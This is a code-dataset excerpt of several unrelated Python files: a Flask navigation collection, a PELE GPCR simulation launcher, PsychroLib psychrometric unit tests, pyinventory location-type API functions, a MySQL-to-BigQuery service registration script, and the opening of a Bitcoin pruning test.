        return any(item.is_active
                   for bar in self._sub_nav_bar
                   for item in bar)
    @property
    def ident(self):
        """The identity of this item.

        :type: :class:`~flask.ext.navigation.Navigation.ItemReference`
        """
        return ItemReference(self.endpoint, self.args)
class ItemCollection(collections.abc.MutableSequence,
                     collections.abc.Iterable):
    """The collection of navigation items.

    This collection is a mutable sequence. All items have an order index, and
    can also be found by endpoint name. e.g.::

        c = ItemCollection()
        c.append(Item(endpoint='doge'))

        print(c['doge'])  # output: Item(endpoint='doge')
        print(c[0])       # output: Item(endpoint='doge')
        print(c)          # output: ItemCollection([Item(endpoint='doge')])
        print(len(c))     # output: 1

        c.append(Item(endpoint='lumpy', args={'num': 4}))

        print(c[1])       # output: Item(endpoint='lumpy', args={'num': 4})
        assert c['lumpy', {'num': 4}] is c[1]

    .. note::
       The base classes come from :mod:`collections.abc`; the old aliases on
       :mod:`collections` were removed in Python 3.10.
    """
    def __init__(self, iterable=None):
        #: the ordered item storage
        self._items = []
        #: the mapping collection of item identity -> item (O(1) lookup)
        self._items_mapping = {}
        #: initial extending
        self.extend(iterable or [])
    def __repr__(self):
        return 'ItemCollection(%r)' % self._items
    def __getitem__(self, index):
        # Integer indices go straight to the ordered storage; anything else
        # is treated as an (endpoint, args) identity lookup.
        if isinstance(index, int):
            return self._items[index]
        if isinstance(index, tuple):
            endpoint, args = index
        else:
            endpoint, args = index, {}
        ident = ItemReference(endpoint, args)
        return self._items_mapping[ident]
    def __setitem__(self, index, item):
        # remove the reference of the replaced item before installing the new one
        old_item = self._items[index]
        del self._items_mapping[old_item.ident]
        self._items[index] = item
        self._items_mapping[item.ident] = item
    def __delitem__(self, index):
        item = self[index]
        del self._items[index]
        del self._items_mapping[item.ident]
    def __len__(self):
        return len(self._items)
    def __iter__(self):
        return iter(self._items)
    def insert(self, index, item):
        """Insert ``item`` at ``index`` and register it for identity lookup."""
        self._items.insert(index, item)
        self._items_mapping[item.ident] = item
class ItemReference(collections.namedtuple('ItemReference', 'endpoint args')):
    """The identity tuple of a navigation item.

    Dict ``args`` are frozen into a hashable tuple so references can be used
    as mapping keys.

    :param endpoint: the endpoint of view function.
    :type endpoint: ``str``
    :param args: the arguments of view function.
    :type args: ``dict``
    """
    def __new__(cls, endpoint, args=()):
        if isinstance(args, dict):
            args = freeze_dict(args)
        # Bug fix: the original called ``super(cls, ItemReference)`` with the
        # arguments swapped, which raises TypeError for any subclass of
        # ItemReference. ``super(ItemReference, cls)`` is the correct form.
        return super(ItemReference, cls).__new__(cls, endpoint, args)
| 33.181818 | 83 | 0.610959 |
ace8cd3a33ad57184a4257b93d404cfed41172e4 | 951 | py | Python | pele_platform/gpcr/main.py | TheKipiDragon/pele_platform | bb33fb69741685d423bdccda4ed104fd0b70ed5b | [
"Apache-2.0"
] | null | null | null | pele_platform/gpcr/main.py | TheKipiDragon/pele_platform | bb33fb69741685d423bdccda4ed104fd0b70ed5b | [
"Apache-2.0"
] | null | null | null | pele_platform/gpcr/main.py | TheKipiDragon/pele_platform | bb33fb69741685d423bdccda4ed104fd0b70ed5b | [
"Apache-2.0"
] | null | null | null | from dataclasses import dataclass
import pele_platform.Adaptive.simulation as si
import pele_platform.Utilities.Helpers.helpers as hp
import pele_platform.Utilities.Parameters.pele_env as pv
@dataclass
class GpcrLauncher():
    """Launcher for GPCR-type PELE simulations.

    Wraps the parsed user arguments, fills in GPCR-specific defaults
    (interface center, simulation box, randomization) and delegates to the
    generic adaptive simulation runner.
    """
    # Parsed simulation parameters; mutated in place by _set_parameters().
    args: pv.EnviroBuilder
    def run_gpcr_simulation(self) -> pv.EnviroBuilder:
        """Configure GPCR parameters, run the adaptive simulation and return
        the resulting parameter object."""
        #Set parameters for gpcr and launch simulation
        self._set_parameters()
        simulation_parameters = si.run_adaptive(self.args)
        return simulation_parameters
    def _set_parameters(self) -> None:
        """Derive box and initial ligand position from the user arguments."""
        # Set box and initial ligand position
        self.orthosteric_site = self.args.orthosteric_site
        self.initial_site = self.args.initial_site
        self.args.center_of_interface = self.initial_site
        # Box center/radius are derived from both sites; weights=[0.35, 0.65]
        # presumably weight the two sites — confirm against hp.retrieve_box.
        self.args.box_center, self.args.box_radius = hp.retrieve_box(
            self.args.system, self.initial_site, self.orthosteric_site,
            weights=[0.35, 0.65])
        self.args.randomize = True
| 33.964286 | 69 | 0.729758 |
ace8cda4822ed1b6bedc2a8f53a1303c374a408b | 12,125 | py | Python | tests/test_psychrolib_ip.py | hongyuanjia/psychrolib | eb2bbcc2a50b5d612287d459f327ebb743bbcf01 | [
"MIT"
] | 119 | 2018-11-30T10:07:59.000Z | 2022-03-31T18:54:41.000Z | tests/test_psychrolib_ip.py | hongyuanjia/psychrolib | eb2bbcc2a50b5d612287d459f327ebb743bbcf01 | [
"MIT"
] | 67 | 2018-12-08T23:09:25.000Z | 2022-02-18T15:16:14.000Z | tests/test_psychrolib_ip.py | hongyuanjia/psychrolib | eb2bbcc2a50b5d612287d459f327ebb743bbcf01 | [
"MIT"
] | 44 | 2018-12-08T21:02:56.000Z | 2022-01-30T18:44:43.000Z | # PsychroLib (version 2.5.0) (https://github.com/psychrometrics/psychrolib).
# Copyright (c) 2018-2020 The PsychroLib Contributors. Licensed under the MIT License.
# Test of PsychroLib in IP units for Python, C, and Fortran.
import numpy as np
import pytest
pytestmark = pytest.mark.usefixtures('SetUnitSystem_IP')
# Test of helper functions
def test_GetTRankineFromTFahrenheit(psy):
    """70 F must convert to 529.67 R."""
    t_rankine = psy.GetTRankineFromTFahrenheit(70)
    assert t_rankine == pytest.approx(529.67, rel=0.000001)
def test_GetTFahrenheitFromTRankine(psy):
    """529.67 R must convert back to 70 F."""
    t_fahrenheit = psy.GetTFahrenheitFromTRankine(529.67)
    assert t_fahrenheit == pytest.approx(70, rel=0.000001)
###############################################################################
# Tests at saturation
###############################################################################
# Test saturation vapour pressure calculation
# The values are tested against the values published in Table 3 of ch. 1 of the 2017 ASHRAE Handbook - Fundamentals
# over the range [-148, +392] F
# ASHRAE's assertion is that the formula is within 300 ppm of the true values, which is true except for the value at -76 F
def test_GetSatVapPres(psy):
    """Saturation vapour pressure vs ASHRAE Handbook Table 3 values (IP)."""
    # (TDryBulb [F], expected SatVapPres [psi], pytest.approx tolerance kwargs)
    cases = [
        (-76, 0.000157, {'abs': 0.00001}),
        ( -4, 0.014974, {'rel': 0.0003}),
        ( 23, 0.058268, {'rel': 0.0003}),
        ( 41, 0.12656,  {'rel': 0.0003}),
        ( 77, 0.45973,  {'rel': 0.0003}),
        (122, 1.79140,  {'rel': 0.0003}),
        (212, 14.7094,  {'rel': 0.0003}),
        (300, 67.0206,  {'rel': 0.0003}),
    ]
    for t_dry_bulb, expected, tolerance in cases:
        assert psy.GetSatVapPres(t_dry_bulb) == pytest.approx(expected, **tolerance)
# Test that the NR in GetTDewPointFromVapPres converges.
# This test was known problem in versions of PsychroLib <= 2.0.0
def test_GetTDewPointFromVapPres_convergence(psy):
    """Sweep temperature / humidity / pressure and check the Newton-Raphson
    solver inside GetTDewPointFromVapPres never fails to converge."""
    dry_bulb_range = np.arange(-148, 392, 1)
    rel_hum_range = np.arange(0, 1, 0.1)
    pressure_range = np.arange(8.6, 17.4, 1)
    for t_dry_bulb in dry_bulb_range:
        for rel_hum in rel_hum_range:
            for pressure in pressure_range:
                # Raises (or hangs) on non-convergence; no value to assert.
                psy.GetTWetBulbFromRelHum(t_dry_bulb, rel_hum, pressure)
    print('GetTDewPointFromVapPres converged')
# Test saturation humidity ratio
# The values are tested against those published in Table 2 of ch. 1 of the 2017 ASHRAE Handbook - Fundamentals
# Agreement is not terrific - up to 2% difference with the values published in the table
def test_GetSatHumRatio(psy):
    """Saturation humidity ratio vs ASHRAE Handbook Table 2 values (IP).

    Agreement is not terrific - up to 2% difference with the published table.
    """
    # (TDryBulb [F], expected W [lb_H2O/lb_dry_air], relative tolerance)
    cases = [
        (-58, 0.0000243, 0.01),
        ( -4, 0.0006373, 0.01),
        ( 23, 0.0024863, 0.005),
        ( 41, 0.005425,  0.005),
        ( 77, 0.020173,  0.005),
        (122, 0.086863,  0.01),
        (185, 0.838105,  0.02),
    ]
    for t_dry_bulb, expected, rel_tol in cases:
        assert psy.GetSatHumRatio(t_dry_bulb, 14.696) == pytest.approx(expected, rel=rel_tol)
# Test enthalpy at saturation
# The values are tested against those published in Table 2 of ch. 1 of the 2017 ASHRAE Handbook - Fundamentals
# Agreement is rarely better than 1%, and close to 3% at -5 C
def test_GetSatAirEnthalpy(psy):
    """Saturated air enthalpy vs ASHRAE Handbook Table 2 values (IP).

    Agreement is rarely better than 1%, and close to 3% around 23 F.
    """
    # (TDryBulb [F], expected enthalpy [Btu/lb], relative tolerance)
    cases = [
        (-58, -13.906, 0.01),
        ( -4,  -0.286, 0.01),
        ( 23,   8.186, 0.03),
        ( 41,  15.699, 0.01),
        ( 77,  40.576, 0.01),
        (122, 126.066, 0.01),
        (185, 999.749, 0.01),
    ]
    for t_dry_bulb, expected, rel_tol in cases:
        assert psy.GetSatAirEnthalpy(t_dry_bulb, 14.696) == pytest.approx(expected, rel=rel_tol)
###############################################################################
# Test of primary relationships between wet bulb temperature, humidity ratio, vapour pressure, relative humidity, and dew point temperatures
# These relationships are identified with bold arrows in the doc's diagram
###############################################################################
# Test of relationships between vapour pressure and dew point temperature
# No need to test vapour pressure calculation as it is just the saturation vapour pressure tested above
def test_VapPres_TDewPoint(psy):
    """Round trip dew point -> vapour pressure -> dew point.

    No need to test the forward direction separately: it is just the
    saturation vapour pressure tested above.
    """
    for t_dew_point, t_dry_bulb in [(-4.0, 59.0), (41.0, 59.0), (122.0, 140.0)]:
        vap_pres = psy.GetVapPresFromTDewPoint(t_dew_point)
        recovered = psy.GetTDewPointFromVapPres(t_dry_bulb, vap_pres)
        assert recovered == pytest.approx(t_dew_point, abs=0.001)
## Test of relationships between humidity ratio and vapour pressure
## Humidity ratio values to test against are calculated with Excel
def test_HumRatio_VapPres(psy):
    """Round trip humidity ratio <-> vapour pressure at 77 F and the standard
    atmospheric pressure at 1000 ft. Expected values computed with Excel."""
    hum_ratio = psy.GetHumRatioFromVapPres(0.45973, 14.175)
    assert hum_ratio == pytest.approx(0.0208473311024865, rel=0.000001)
    vap_pres = psy.GetVapPresFromHumRatio(hum_ratio, 14.175)
    assert vap_pres == pytest.approx(0.45973, abs=0.00001)
## Test of relationships between vapour pressure and relative humidity
def test_VapPres_RelHum(psy):
    """Round trip vapour pressure <-> relative humidity at 77 F, RH 80%."""
    vap_pres = psy.GetVapPresFromRelHum(77, 0.8)
    assert vap_pres == pytest.approx(0.45973 * 0.8, rel=0.0003)
    rel_hum = psy.GetRelHumFromVapPres(77, vap_pres)
    assert rel_hum == pytest.approx(0.8, rel=0.0003)
## Test of relationships between humidity ratio and wet bulb temperature
## The formulae are tested for two conditions, one above freezing and the other below
## Humidity ratio values to test against are calculated with Excel
def test_HumRatio_TWetBulb(psy):
    """Round trip humidity ratio <-> wet bulb temperature, above and below
    freezing. Expected humidity ratios computed with Excel."""
    # Above freezing
    HumRatio = psy.GetHumRatioFromTWetBulb(86, 77, 14.175)
    assert HumRatio == pytest.approx(0.0187193288418892, rel = 0.0003)
    TWetBulb = psy.GetTWetBulbFromHumRatio(86, HumRatio, 14.175)
    assert TWetBulb == pytest.approx(77, abs = 0.001)
    # Below freezing
    HumRatio = psy.GetHumRatioFromTWetBulb(30.2, 23.0, 14.175)
    assert HumRatio == pytest.approx(0.00114657481090184, rel = 0.0003)
    # Bug fix: the reverse conversion previously used pressure 14.1751
    # instead of the 14.175 used above, so the round trip was not performed
    # at a single pressure.
    TWetBulb = psy.GetTWetBulbFromHumRatio(30.2, HumRatio, 14.175)
    assert TWetBulb == pytest.approx(23.0, abs = 0.001)
    # Low HumRatio -- this should evaluate true as we clamp the HumRatio to 1e-07.
    assert psy.GetTWetBulbFromHumRatio(25,1e-09,95461) == psy.GetTWetBulbFromHumRatio(25,1e-07,95461)
###############################################################################
# Dry air calculations
###############################################################################
# Values are compared against values found in Table 2 of ch. 1 of the ASHRAE Handbook - Fundamentals
# Note: the accuracy of the formula is not better than 0.1%, apparently
def test_DryAir(psy):
    """Dry-air property functions vs ASHRAE Handbook Table 2 (IP).

    Note: the accuracy of the underlying formulae is apparently not better
    than 0.1%.
    """
    enthalpy = psy.GetDryAirEnthalpy(77)
    assert enthalpy == pytest.approx(18.498, rel=0.001)
    volume = psy.GetDryAirVolume(77, 14.696)
    assert volume == pytest.approx(13.5251, rel=0.001)
    # Density must be the reciprocal of the specific volume above.
    density = psy.GetDryAirDensity(77, 14.696)
    assert density == pytest.approx(1 / 13.5251, rel=0.001)
    t_dry_bulb = psy.GetTDryBulbFromEnthalpyAndHumRatio(42.6168, 0.02)
    assert t_dry_bulb == pytest.approx(85.97, abs=0.05)
    hum_ratio = psy.GetHumRatioFromEnthalpyAndTDryBulb(42.6168, 86)
    assert hum_ratio == pytest.approx(0.02, rel=0.001)
###############################################################################
# Moist air calculations
###############################################################################
# Values are compared against values calculated with Excel
def test_MoistAir(psy):
    """Moist-air properties at 86 F, W = 0.02, 14.175 psi, compared against
    values calculated with Excel."""
    t_dry_bulb, hum_ratio, pressure = 86, 0.02, 14.175
    assert psy.GetMoistAirEnthalpy(t_dry_bulb, hum_ratio) == pytest.approx(42.6168, rel=0.0003)
    assert psy.GetMoistAirVolume(t_dry_bulb, hum_ratio, pressure) == pytest.approx(14.7205749002918, rel=0.0003)
    assert psy.GetMoistAirDensity(t_dry_bulb, hum_ratio, pressure) == pytest.approx(0.0692907720594378, rel=0.0003)
def test_GetTDryBulbFromMoistAirVolumeAndHumRatio(psy):
    """Round trip: recover the dry-bulb temperature from moist-air volume."""
    t_dry_bulb = psy.GetTDryBulbFromMoistAirVolumeAndHumRatio(
        14.7205749002918, 0.02, 14.175
    )
    assert t_dry_bulb == pytest.approx(86, rel=0.0003)
###############################################################################
# Test standard atmosphere
###############################################################################
# The functions are tested against Table 1 of ch. 1 of the 2017 ASHRAE Handbook - Fundamentals
def test_GetStandardAtmPressure(psy):
    """Standard-atmosphere pressure against Table 1, ch. 1 of the 2017
    ASHRAE Handbook - Fundamentals (IP units).
    """
    # (altitude [ft], expected pressure [psi])
    reference_table = [
        (-1000, 15.236),
        (0, 14.696),
        (1000, 14.175),
        (3000, 13.173),
        (10000, 10.108),
        (30000, 4.371),
    ]
    for altitude, pressure in reference_table:
        assert psy.GetStandardAtmPressure(altitude) == pytest.approx(pressure, abs=1)
def test_GetStandardAtmTemperature(psy):
    """Standard-atmosphere temperature against Table 1, ch. 1 of the 2017
    ASHRAE Handbook - Fundamentals (IP units).
    """
    # (altitude [ft], expected temperature [degF], absolute tolerance)
    reference_table = [
        (-1000, 62.6, 0.1),
        (0, 59.0, 0.1),
        (1000, 55.4, 0.1),
        (3000, 48.3, 0.1),
        (10000, 23.4, 0.1),
        (30000, -47.8, 0.2),  # doesn't agree to within abs = 0.1 at this altitude
    ]
    for altitude, temperature, tolerance in reference_table:
        assert psy.GetStandardAtmTemperature(altitude) == pytest.approx(
            temperature, abs=tolerance
        )
###############################################################################
# Test sea level pressure conversions
###############################################################################
# Test sea level pressure calculation against https://keisan.casio.com/exec/system/1224575267,
# converted to IP
def test_SeaLevel_Station_Pressure(psy):
    """Sea-level <-> station pressure round trip.

    Reference values from https://keisan.casio.com/exec/system/1224575267,
    converted to IP units.
    """
    sea_level_pressure = psy.GetSeaLevelPressure(14.681662559, 344.488, 62.942)
    assert sea_level_pressure == pytest.approx(14.8640475, abs=0.0001)
    station_pressure = psy.GetStationPressure(sea_level_pressure, 344.488, 62.942)
    assert station_pressure == pytest.approx(14.681662559, abs=0.0001)
###############################################################################
# Test conversion between humidity types
###############################################################################
def test_GetSpecificHumFromHumRatio(psy):
    """Humidity ratio -> specific humidity conversion."""
    specific_hum = psy.GetSpecificHumFromHumRatio(0.006)
    assert specific_hum == pytest.approx(0.00596421471, rel=0.01)
def test_GetHumRatioFromSpecificHum(psy):
    """Specific humidity -> humidity ratio conversion (inverse of the above)."""
    hum_ratio = psy.GetHumRatioFromSpecificHum(0.00596421471)
    assert hum_ratio == pytest.approx(0.006, rel=0.01)
###############################################################################
# Test against Example 1 of ch. 1 of the 2017 ASHRAE Handbook - Fundamentals
###############################################################################
def test_AllPsychrometrics(psy):
    """Example 1 of ch. 1 of the 2017 ASHRAE Handbook - Fundamentals.

    Forward calculation from wet bulb, then two reverse round trips that must
    each recover the original wet-bulb temperature.
    """
    # This is example 1. The expected values are quoted in the Handbook text.
    # Result tuple layout: (HumRatio, TDewPoint, RelHum, VapPres,
    # MoistAirEnthalpy, MoistAirVolume, DegreeOfSaturation).
    forward = psy.CalcPsychrometricsFromTWetBulb(100, 65, 14.696)
    assert forward[0] == pytest.approx(0.00523, abs=0.001)   # HumRatio
    assert forward[1] == pytest.approx(40, abs=1.0)          # TDewPoint; not great agreement
    assert forward[2] == pytest.approx(0.13, abs=0.01)       # RelHum
    assert forward[4] == pytest.approx(29.80, abs=0.1)       # MoistAirEnthalpy
    assert forward[5] == pytest.approx(14.22, rel=0.01)      # MoistAirVolume
    # Reverse calculation: recalculate wet bulb temperature from dew point.
    # Result tuple layout: (HumRatio, TWetBulb, RelHum, ...).
    from_dew_point = psy.CalcPsychrometricsFromTDewPoint(100, forward[1], 14.696)
    assert from_dew_point[1] == pytest.approx(65, abs=0.1)
    # Reverse calculation: recalculate wet bulb temperature from the relative
    # humidity returned by the dew-point calculation (as in the original test).
    from_rel_hum = psy.CalcPsychrometricsFromRelHum(100, from_dew_point[2], 14.696)
    assert from_rel_hum[1] == pytest.approx(65, abs=0.1)
| 56.658879 | 140 | 0.654268 |
ace8cdbf1b3b2b44a862b3a73378fb92054ef38f | 5,115 | py | Python | symphony/cli/pyinventory/api/location_type.py | rohan-prasad/magma | 2c1f36d2fd04eae90366cc8b314eaab656d7f8ad | [
"BSD-3-Clause"
] | null | null | null | symphony/cli/pyinventory/api/location_type.py | rohan-prasad/magma | 2c1f36d2fd04eae90366cc8b314eaab656d7f8ad | [
"BSD-3-Clause"
] | 6 | 2021-03-31T19:59:59.000Z | 2022-01-22T12:56:47.000Z | symphony/cli/pyinventory/api/location_type.py | fbcode/magma_old | 054ef8e079478bda36d2b13b8a88386c6dc94ef2 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2004-present Facebook All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
from typing import List
from pysymphony import SymphonyClient
from ..common.cache import LOCATION_TYPES
from ..common.data_class import Location, LocationType, PropertyDefinition
from ..common.data_enum import Entity
from ..common.data_format import (
format_to_property_definitions,
format_to_property_type_inputs,
)
from ..exceptions import EntityNotFoundError
from ..graphql.input.add_location_type import AddLocationTypeInput
from ..graphql.mutation.add_location_type import AddLocationTypeMutation
from ..graphql.mutation.remove_location_type import RemoveLocationTypeMutation
from ..graphql.query.location_type_locations import LocationTypeLocationsQuery
from ..graphql.query.location_types import LocationTypesQuery
from .location import delete_location
def _populate_location_types(client: SymphonyClient) -> None:
    """Fill the module-level LOCATION_TYPES cache from the backend.

    Fetches every location type via GraphQL and stores a LocationType entry
    keyed by name; edges without a node are skipped.
    """
    response = LocationTypesQuery.execute(client)
    if not response:
        return
    for edge in response.edges:
        node = edge.node
        if not node:
            continue
        LOCATION_TYPES[node.name] = LocationType(
            name=node.name,
            id=node.id,
            property_types=format_to_property_definitions(node.propertyTypes),
        )
def add_location_type(
    client: SymphonyClient,
    name: str,
    properties: List[PropertyDefinition],
    map_zoom_level: int = 8,
) -> LocationType:
    """This function creates new location type.

    Args:
        name (str): location type name
        properties (List[ `pyinventory.common.data_class.PropertyDefinition` ]): list of property definitions
        map_zoom_level (int): map zoom level

    Returns:
        `pyinventory.common.data_class.LocationType` object

    Raises:
        FailedOperationException: internal inventory error

    Example:
        ```
        location_type = client.add_location_type(
            name="city",
            properties=[
                PropertyDefinition(
                    property_name="Contact",
                    property_kind=PropertyKind.string,
                    default_raw_value=None,
                    is_fixed=True
                )
            ],
            map_zoom_level=5,
        )
        ```
    """
    # Convert the user-facing PropertyDefinition objects into GraphQL inputs.
    new_property_types = format_to_property_type_inputs(data=properties)
    result = AddLocationTypeMutation.execute(
        client,
        AddLocationTypeInput(
            name=name,
            mapZoomLevel=map_zoom_level,
            properties=new_property_types,
            surveyTemplateCategories=[],
        ),
    )
    # Mirror the freshly created type into the module-level cache so later
    # lookups by name do not need another round trip to the server.
    location_type = LocationType(
        name=result.name,
        id=result.id,
        property_types=format_to_property_definitions(result.propertyTypes),
    )
    LOCATION_TYPES[result.name] = location_type
    return location_type
def delete_locations_by_location_type(
    client: SymphonyClient, location_type: LocationType
) -> None:
    """Delete locations by location type.

    Args:
        location_type ( `pyinventory.common.data_class.LocationType` ): location type object

    Raises:
        `pyinventory.exceptions.EntityNotFoundError`: if location_type does not exist

    Example:
        ```
        client.delete_locations_by_location_type(location_type=location_type)
        ```
    """
    location_type_with_locations = LocationTypeLocationsQuery.execute(
        client, id=location_type.id
    )
    # A None result means the type id is unknown to the server.
    if location_type_with_locations is None:
        raise EntityNotFoundError(
            entity=Entity.LocationType, entity_id=location_type.id
        )
    locations = location_type_with_locations.locations
    # No locations of this type: nothing to delete.
    if locations is None:
        return
    for location in locations.edges:
        node = location.node
        if node:
            # Rebuild a client-side Location object from the GraphQL node and
            # delete it one at a time (delete_location handles its children).
            delete_location(
                client,
                Location(
                    id=node.id,
                    name=node.name,
                    latitude=node.latitude,
                    longitude=node.longitude,
                    external_id=node.externalId,
                    location_type_name=node.locationType.name,
                    properties=node.properties,
                ),
            )
def delete_location_type_with_locations(
    client: SymphonyClient, location_type: LocationType
) -> None:
    """Delete location type with existing locations.

    Args:
        location_type (`pyinventory.common.data_class.LocationType`): location type object

    Raises:
        `pyinventory.exceptions.EntityNotFoundError`: if location_type does not exist

    Example:
        ```
        client.delete_location_type_with_locations(location_type=location_type)
        ```
    """
    # Delete all member locations first, then drop the now-empty type itself.
    delete_locations_by_location_type(client, location_type)
    RemoveLocationTypeMutation.execute(client, id=location_type.id)
| 32.579618 | 113 | 0.647312 |
ace8ce28b1e8e6c9e6095c5dc4adb330c43e26bf | 3,663 | py | Python | src/add_service.py | beirving/mysql-to-bigquery | 75dfe3390f1e1a0dc54d5cace0cf1a89a0560ae6 | [
"MIT"
] | null | null | null | src/add_service.py | beirving/mysql-to-bigquery | 75dfe3390f1e1a0dc54d5cace0cf1a89a0560ae6 | [
"MIT"
] | null | null | null | src/add_service.py | beirving/mysql-to-bigquery | 75dfe3390f1e1a0dc54d5cace0cf1a89a0560ae6 | [
"MIT"
] | null | null | null | import os
import re
import pandas as pd
from prefect import Task, Flow
from cryptography.fernet import Fernet
from google.oauth2 import service_account
from mysql_bigquery.adapters.storage import StorageAdapter
from mysql_bigquery.adapters.bigquery import BigQueryAdapter
from mysql_bigquery.adapters.stackdriver import StackDriverAdapter
import mysql_bigquery.prefect_utils.add.storage as storage_add
import mysql_bigquery.prefect_utils.add.big_query as big_query_add
import mysql_bigquery.prefect_utils.add.populate_tracking_table as populate
class AddService(Task):
    """Interactive prefect Task that registers a new MySQL data source.

    Collects connection details from stdin, encrypts the sensitive fields
    with a per-service Fernet key, stores the key in Cloud Storage, records
    the service in BigQuery, and provisions the downstream sync resources.
    """

    def __init__(self):
        # Fix: a prefect Task subclass must initialize the base class so the
        # task gets its name/slug and scheduling state set up.
        super().__init__()
        self.service = None
        self.data_set = None
        self.host = None
        self.user = None
        self.password = None
        self.database = None
        self.key = None  # Fernet key (bytes) set by generate_key()
        self.service_account = service_account.Credentials.from_service_account_file(
            os.environ['MYSQL_BIG_QUERY_GOOGLE_AUTH']
        )
        self.sd_logger = StackDriverAdapter(self.service_account)
        self.sd_logger.get_client()
        self.sd_logger.create_logger("add-service")

    def generate_key(self):
        """Create a fresh Fernet key used to encrypt this service's secrets."""
        self.key = Fernet.generate_key()

    def set_attribute(self, attribute: str, value: str, encode: bool = False):
        """Set `attribute` to `value`, Fernet-encrypting it first when `encode`.

        Requires generate_key() to have been called when encode is True.
        """
        if encode:
            f = Fernet(self.key)
            encoded = f.encrypt(bytes(value, encoding='utf-8'))
            value = str(encoded, 'utf-8')
        setattr(self, attribute, value)

    def save_key(self):
        """Persist the Fernet key to the 'mysql_sync_keys' bucket.

        Raises:
            RuntimeError: if the storage write reports failure.
        """
        storage_client = StorageAdapter(self.service_account)
        storage_client.get_client()
        result = storage_client.write_string(
            bucket='mysql_sync_keys',
            destination=f"{self.service}",
            string=self.key
        )
        if result is False:
            raise RuntimeError(storage_client.errors)

    def save_record(self):
        """Append this service's (encrypted) connection record to BigQuery.

        NOTE(review): failures are only logged to Stackdriver, not raised —
        presumably intentional best-effort behavior; confirm with callers.
        """
        record = {
            'service': [self.service],
            'data_set': [self.data_set],
            'host': [self.host],
            'user': [self.user],
            'password': [self.password],
            'database': [self.database]
        }
        df = pd.DataFrame(record)
        big_query = BigQueryAdapter(self.service_account)
        big_query.get_client()
        big_query.set_data_set_ref('mysql_sync')
        big_query.set_table_ref('data_sources')
        result = big_query.upload_data_frame(df)
        if result is False:
            self.sd_logger.error(
                big_query.errors,
                {'class': 'AddService', 'method': 'save_record'}
            )

    def storage(self):
        """Provision Cloud Storage resources for the new service."""
        return storage_add.storage_flow_runner(self.service)

    def big_query(self):
        """Provision BigQuery resources for the new service."""
        return big_query_add.big_query_flow_runner(self.service)

    def populate_tracking(self):
        """Seed the tracking table for the new service."""
        return populate.populate_tracking_table_flow_runner(self.service)

    def run_set_up(self):
        """Prompt for all connection details on stdin and store them.

        Service names are normalized to hyphenated tokens, data set names to
        underscored tokens; host/user/password are stored encrypted.
        """
        service = input('Service Name: ')
        # Replace every non-word character and underscores with '-'.
        service = re.sub(r"[^\w]|_", '-', service)
        self.set_attribute('service', service)
        data_set = input('Data Set: ')
        # Replace every non-word character and hyphens with '_'.
        data_set = re.sub(r"[^\w]|-", '_', data_set)
        self.set_attribute('data_set', data_set)
        self.set_attribute('host', input('MySQL Host Connection: '), True)
        self.set_attribute('user', input('MySQL Connection User: '), True)
        self.set_attribute('password', input('MySQL Connection Password: '), True)
        self.set_attribute('database', input('MySQL Database: '))
# Interactive entry point: build and immediately run the one-off "Add Service"
# flow.  NOTE(review): the AddService methods below are plain method calls, not
# prefect task invocations, so the work appears to happen eagerly while the
# flow is being constructed — confirm this is intended.
with Flow('Add Service') as flow:
    add = AddService()
    add.generate_key()
    add.run_set_up()
    add.save_key()
    add.save_record()
    add.storage()
    add.big_query()
    add.populate_tracking()
    state = flow.run()
| 32.415929 | 85 | 0.64783 |
ace8ced42292e4478617f322a0bc00a0dc789767 | 21,420 | py | Python | qa/rpc-tests/pruning.py | alexandergaldones/bitcoin | 6206252e5073c1cde2e313f2e5a3ca17582c5823 | [
"MIT"
] | null | null | null | qa/rpc-tests/pruning.py | alexandergaldones/bitcoin | 6206252e5073c1cde2e313f2e5a3ca17582c5823 | [
"MIT"
] | 1 | 2017-03-10T16:37:46.000Z | 2017-03-10T16:37:46.000Z | qa/rpc-tests/pruning.py | PETER-ITPE/bitcoin_pjt | 53c300fb525ab3e21206d47d8353f5246b4f24d1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the pruning code.
WARNING:
This test uses 4GB of disk space.
This test takes 30 mins or more (up to 2 hours)
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
import os
# Minimum number of most-recent blocks a pruning node must always retain
# (mirrors the MIN_BLOCKS_TO_KEEP constant enforced by the node).
MIN_BLOCKS_TO_KEEP = 288

# Rescans start at the earliest block up to 2 hours before a key timestamp, so
# the manual prune RPC avoids pruning blocks in the same window to be
# compatible with pruning based on key creation time.
RESCAN_WINDOW = 2 * 60 * 60
def calc_usage(blockdir):
    """Return the total size, in MiB, of the regular files directly in *blockdir*.

    Subdirectories are ignored.  Uses os.path.join instead of raw string
    concatenation, so *blockdir* works both with and without a trailing
    path separator (the previous `blockdir+f` form silently produced wrong
    paths when the separator was missing).
    """
    return sum(
        os.path.getsize(os.path.join(blockdir, f))
        for f in os.listdir(blockdir)
        if os.path.isfile(os.path.join(blockdir, f))
    ) / (1024. * 1024.)
class PruneTest(BitcoinTestFramework):
    """Functional test for block-file pruning (-prune), both automatic and manual.

    WARNING: uses ~4GB of disk space and can take 30 minutes to 2 hours.
    Node roles: 0/1 mine, 2 auto-prunes at 550MB, 3/4 test manual pruning,
    5 tests the wallet on a pruned node.
    """

    def __init__(self):
        super().__init__()
        self.setup_clean_chain = True
        self.num_nodes = 6

        # Cache for utxos, as the listunspent may take a long time later in the test
        self.utxo_cache_0 = []
        self.utxo_cache_1 = []

    def setup_network(self):
        """Start all six nodes and wire up the mining/pruning topology."""
        self.nodes = []
        self.is_network_split = False

        # Create nodes 0 and 1 to mine
        self.nodes.append(start_node(0, self.options.tmpdir, ["-debug","-maxreceivebuffer=20000","-blockmaxsize=999000", "-checkblocks=5"], timewait=900))
        self.nodes.append(start_node(1, self.options.tmpdir, ["-debug","-maxreceivebuffer=20000","-blockmaxsize=999000", "-checkblocks=5"], timewait=900))

        # Create node 2 to test pruning
        self.nodes.append(start_node(2, self.options.tmpdir, ["-debug","-maxreceivebuffer=20000","-prune=550"], timewait=900))
        self.prunedir = self.options.tmpdir+"/node2/regtest/blocks/"

        # Create nodes 3 and 4 to test manual pruning (they will be re-started with manual pruning later)
        self.nodes.append(start_node(3, self.options.tmpdir, ["-debug=0","-maxreceivebuffer=20000","-blockmaxsize=999000"], timewait=900))
